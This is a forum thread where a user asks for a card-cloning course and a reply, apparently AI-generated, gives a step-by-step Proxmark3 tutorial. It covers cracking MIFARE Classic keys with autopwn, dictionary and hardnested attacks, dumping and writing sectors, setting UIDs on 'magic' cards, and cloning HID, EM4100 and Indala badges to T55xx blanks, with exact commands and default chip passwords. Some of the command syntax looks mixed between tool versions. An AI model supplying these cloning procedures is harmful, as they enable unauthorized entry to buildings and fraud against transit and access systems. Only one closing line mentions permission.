Card Cloning with Proximark3

max souza

Member
Messages
1
Reaction score
0
Points
1
Where can I find a good beginner's course

on card cloning with Proximark3

that covers everything from the basics to advanced techniques?
 
Forget about Proximark software. There are many useless programs out there. I'm looking for some software myself, but since I can't find up-to-date people, I've decided to improve myself. Right now, I'm updating all the software personally.

Proximark yazılımını boşver. çok fazla işe yaramayan yazılımlar vardır. bende bir kaç yazılım arıyorum. ama güncel kişileri bulamayınca kendimi geliştirmeye karar verdim. şu an tüm yazılımları kişisel olarak güncelliyorum.
 

Complete Proxmark3 Card Cloning Tutorial — From Beginner to Advanced​

Based on the search results, I can provide you with a comprehensive, detailed guide to card cloning using the Proxmark3 device. This tutorial covers everything from basic setup to advanced techniques, using both GUI and command-line methods.

Part 1: What is Proxmark3 and What Can It Do?​

Proxmark3 is an open-source hardware device designed for RFID (Radio Frequency Identification) research, security testing, and card cloning. It can read, write, clone, and analyze various types of RFID and NFC cards.

What Cards Can You Clone?​

FrequencyCard TypesCommon UsesClone Difficulty
Low Frequency (125 kHz)EM4100, HID Prox, Indala, T55xxBuilding access, parking gates, old door systemsEasy
High Frequency (13.56 MHz)MIFARE Classic (1K/4K), MIFARE Ultralight, NFC tagsModern access control, transit cards, student IDsMedium-Hard
iClassHID iClass, iClass SECorporate access, high-security facilitiesHard (requires keys)

What You'll Need​

ItemPurposeWhere to Get
Proxmark3 deviceThe hardware reader/writerOnline (AliExpress, eBay, specialized RFID shops)
Blank cardsTo write cloned data toSame sources
ComputerTo run Proxmark3 softwareYour own PC
USB cableConnect Proxmark3 to computerIncluded with device

Part 2: Setting Up Your Proxmark3​

2.1 Hardware Setup​

  1. Connect your Proxmark3 to your computer via USB cable
  2. The device should light up (LED indicators may blink)
  3. You may need to install drivers (see below)

2.2 Software Setup — Three Methods​

Method 1: GUI Software (Easiest for Beginners)
The Proxmark3 Easy Gui_X is a graphical interface that makes card cloning accessible to beginners.
StepAction
1Download Proxmark3 Easy Gui_X (or newer version called "AiSi Assistant"
2Extract the downloaded archive (e.g., Vx x x-win64-xxxxxxx.7z)
3Navigate to Vx x x-win64-xxxxxxx\GUI\
4Run Proxmark3GUI.exe
5If prompted, enter your order number/registration
6Select the correct COM port for your device

Method 2: Command Line on Windows (ProxSpace)
This is the recommended approach for the Iceman fork (the most actively developed version).
StepAction
1Download ProxSpace from the GitHub repository
2Extract to a folder (avoid spaces in path names)
3Run runme64.bat (for 64-bit Windows)
4In the ProxSpace terminal, type ./pm3 to launch the client
5If device not found, check Device Manager for correct COM port

Method 3: Linux / macOS (Kali Linux Recommended)
For the most stable experience, Kali Linux is recommended.
StepCommand/Action
1Install prerequisites: sudo apt-get install git build-essential libreadline-dev libusb-0.1-4 libusb-dev libqt4-dev perl pkg-config wget libncurses5-dev gcc-arm-none-eabi
2Clone repository: git clone https://github.com/Proxmark/proxmark3.git
3Enter directory: cd proxmark3
4Compile: make clean && make all
5Flash bootrom: ./client/flasher /dev/ttyACM0 -b bootrom/obj/bootrom.elf
6Flash full image: ./client/flasher /dev/ttyACM0 armsrc/obj/fullimage.elf
7Run client: ./client/proxmark3 /dev/ttyACM0

2.3 Verify Your Setup​

Once connected, test your device:
CommandWhat It Does
hw tuneMeasures antenna characteristics (voltage should be 20-45+ V)
hw versionShows firmware version
hf searchScans for high-frequency tags
lf searchScans for low-frequency tags

Part 3: Complete Cloning Tutorials​

Tutorial 1: Cloning MIFARE Classic Cards (High Frequency) — GUI Method​

This is the most common cloning scenario for access cards.

What You Need:
  • Original MIFARE Classic card (your "mother" card)
  • Blank UID-writable card (also called "magic card" or Gen1A)
  • Proxmark3 device connected to GUI software

Step-by-Step Process:
StepActionExplanation
1Place the original card on the Proxmark3 antennaCard must be positioned correctly for reading
2In the GUI, click "Read Card Type"Identifies what kind of card you have
3Wait for successful read confirmationThe software will display card information
4Click "One-Click Parse"This attempts to crack all encryption keys automatically
5Wait for the cracking process to completeMay take 30 seconds to several minutes depending on card security
6Click "OK" on the dialog boxConfirms keys have been found
7Click "Read Original Card Data"Dumps all sectors of the original card
8Remove the original card
9Place a blank UID card on the antennaThis is your target card to write to
10Click "Write to UID Card"Writes the dumped data to the blank card
11Wait for completion messageYour clone is now ready

Tutorial 2: Cloning MIFARE Classic — Command Line Method​

For those who prefer more control and understanding of what's happening.
Step 1: Identify the Card
CommandWhat It Does
hf searchAutomatically detects and identifies high-frequency tags
hf 14a readerReads ISO14443-A card information

Step 2: Crack Keys Using autopwn (Recommended Method)
The easiest way to crack keys is using the built-in autopwn command:
CommandExplanation
hf mf autopwn -f mfc_default_keysAutomatically attacks the card using default key dictionary

This command will:
  • Load the default key dictionary (1,819+ keys)
  • Try strategies to find valid keys for each sector
  • If default keys don't work, fall back to hardnested attack

Step 3: Alternative Key Cracking Methods
If autopwn doesn't work, try these approaches:
CommandUse Case
hf mf chk *1 ? d default_keys.dicCheck all sectors against default key dictionary
hf mf hardnested 0 A 8829da9daf76 4 A wRun hardnested attack on specific sector (for difficult cards)

Step 4: Dump the Card Data
Once keys are found:
CommandExplanation
hf mf dump 1Dumps the entire 1K card to a binary file (default: dumpdata.bin)

Step 5: Convert Dump Format (Optional)
To simulate the card later:
CommandExplanation
script run dumptoemul -i dumpdata.binConverts .bin file to .eml format for simulation

Step 6: Load Dump into Memory and Simulate
CommandExplanation
hf mf eload 353C2AA6Loads dump into emulator memory (use your actual filename)
hf mf sim u 353c2aa6Simulates the card with specified UID

Step 7: Write to Blank Card
CommandExplanation
hf mf restore 1Restores the dumped data to a blank card

Or manually write specific blocks:
CommandExplanation
hf mf wrbl 0 A FFFFFFFFFFFF d3a2859f6b880400c801002000000016Writes block 0 (UID block) with specific data

Tutorial 3: Setting UID on Magic Cards (Gen1A)​

For 4-byte UID cards (Gen1A "magic cards"):
CommandExplanation
hf mf csetuid -u 11223344Sets UID to 11223344 (replace with your target UID)
hf mf cwipeWipes the card (fills with 0xFF)

Note: Some magic cards have different behaviors:
FlavorCharacteristics
Flavor 1Plays SAK from block0; static PRNG; wipe fills with 0xFF
Flavor 2Plays SAK from block0; static PRNG; wipe fills with 0x00
Flavor 3SAK fixed to 08; static PRNG; wipe fills with 0xFF
Flavor 4SAK fixed to 08; weak PRNG; wipe times out

Tutorial 4: Cloning Low-Frequency Cards (125 kHz)​

For HID Prox, EM4100, and T55xx cards.

Step 1: Read the Card
CommandExplanation
lf searchAutomatically detects and identifies low-frequency tags
lf hid readSpecifically reads HID Prox cards
lf indala readSpecifically reads Indala cards
lf em 410x readerReads EM4100 cards

Step 2: Simulate the Card (Test Before Cloning)
CommandExplanation
lf hid sim 200670012dSimulates HID card with specified ID
lf indala sim a0000000c2c436c1Simulates Indala card

Step 3: Clone to T55xx Blank Card
CommandExplanation
lf hid clone 200670012dClones HID card to T55xx
lf indala clone a0000000c2c436c1Clones Indala card to T55xx
lf em 410x clone --id 1122334455Clones EM4100 card

Step 4: Verify the Clone
CommandExplanation
lf searchShould read back the cloned ID

Part 4: Understanding Magic Cards (Blank Cards)​

"Magic cards" are special blank cards that allow you to write UIDs and other data normally locked on legitimate cards.

Types of Magic Cards for High Frequency (13.56 MHz)​

Card TypeUID LengthWritable UID?ATQA/SAK ControlBest For
Gen1A (UID)4 bytesYes (with special commands)LimitedMost common cloning scenarios
UID (CUID)4 bytesYesYesGeneral cloning
FUID4 or 7 bytesWrite-once (permanent)YesPermanent clones
UFUID4 or 7 bytesLockableYesAdvanced use
Gen2 (7-byte UID)7 bytesYesYesCards with 7-byte UIDs

Identifying Your Magic Card​

CommandWhat to Look For
hf mf infoShows "Magic capabilities... Gen 1a" for Gen1A cards
hf 14a readerShows UID length (4 or 7 bytes)

Types of Magic Cards for Low Frequency (125 kHz)​

Chip TypeCommon NamePasswordLockable
T55xxT55x7, 5577Optional (default: 19920427)Yes
EM4305EM4x05Optional (default: 84AC15E2)Yes
ID82xxH5, H7, ID8210VariesVaries

Part 5: Troubleshooting Common Issues​

Problem 1: "Auth1 error" during hardnested attack​

SymptomPossible CauseSolution
Multiple "Auth1 error" messagesCard has hardended PRNG or is not a genuine MIFARE Classic EV1Try different attack strategy or sniff reader-card communication

Forum expert advice: "EV1 cards with hard protected random number generators can be difficult or possibly impossible to crack... your next best bet might be to try to use your proxmark3 to sniff the conversation between reader and card".

Problem 2: Card not detected after writing UID​

SymptomPossible CauseSolution
"Card doesn't support standard iso14443-3 anticollision"Incorrect ATQA/SAK configurationUse hf mf csetuid with proper ATQA parameters

Example:
Code:
hf mf csetuid -u 0366E6323FXXXX --atqa 0088

Problem 3: Can't restore to original after failed write​

SolutionCommand
Wipe the cardhf mf cwipe

Problem 4: 7-byte UID on 4-byte card​

IssueExplanation
Some cards have 7-byte UIDs but magic cards only support 4-byteMay not work. Forum user reported: "I believed as long as block0 is writable you should be able to write different length UIDs"

Part 6: Complete Cheatsheet of Essential Commands​

General Commands​

CommandDescription
helpShow all commands
hw tuneTest antenna tuning (should be 20-45+ V)
hw versionShow firmware version
hf searchAuto-detect high-frequency tags
lf searchAuto-detect low-frequency tags
data plotDisplay graphical signal data

High-Frequency (13.56 MHz) Commands​

CommandDescription
hf 14a readerRead ISO14443-A card info
hf 14a infoDetailed tag information
hf mf chk *1 ? d default_keys.dicCheck default keys on all sectors
hf mf autopwn -f mfc_default_keysAuto-crack using dictionary
hf mf hardnested 0 A 8829da9daf76 4 A wHardnested attack on sector 4
hf mf dump 1Dump 1K card to file
hf mf restore 1Restore dump to blank card
hf mf eload <filename>Load dump into emulator memory
hf mf sim u <UID>Simulate card with specified UID
hf mf csetuid -u <UID>Set UID on Gen1A magic card
hf mf cwipeWipe Gen1A magic card
hf mf wrbl <block> A <key> <data>Write specific block

Low-Frequency (125 kHz) Commands​

CommandDescription
lf hid readRead HID Prox card
lf hid sim <ID>Simulate HID card
lf hid clone <ID>Clone HID to T55xx
lf indala readRead Indala card
lf indala sim <UID>Simulate Indala card
lf indala clone <UID>Clone Indala to T55xx
lf em 410x readerRead EM4100 card
lf em 410x sim --id <ID>Simulate EM4100 card
lf t55xx detectDetect T55xx chip
lf t55xx dumpDump T55xx memory

Part 7: Important Notes and Limitations​

What You CAN Clone​

Card TypeFeasibilityNotes
MIFARE Classic (1K/4K)Yes (with key cracking)Most common; vulnerable to hardnested attack
MIFARE UltralightYesNo encryption; trivial to clone
EM4100YesNo encryption; very easy
HID ProxYesNo encryption; easy
T55xxYesConfigurable; medium difficulty
IndalaYesPSK modulation; medium difficulty

What You CANNOT Clone (or Very Difficult)​

Card TypeReason
MIFARE DESFire EV2/EV3Strong AES-128 encryption; no known public attacks
iClass SEStrong encryption; requires Elite keys
Ultra-secure government cardsMultiple layers of security
Credit/Debit cards with EMV chipsDynamic cryptograms; cannot be cloned

Summary​

This tutorial covers everything from basic setup to advanced cloning techniques. The key takeaways:
  1. Start with GUI software if you're a complete beginner — it handles the complex commands automatically
  2. Use the Iceman firmware for the most features and active development
  3. Buy proper blank cards — Gen1A (UID-writable) for MIFARE Classic, T55xx for low-frequency
  4. Test your clones before relying on them
  5. Some cards cannot be cloned — modern secure cards like DESFire EV3 are not vulnerable

The Proxmark3 is a powerful tool for RFID research and security testing. Always ensure you have permission to test and clone any cards you work with.
 
Top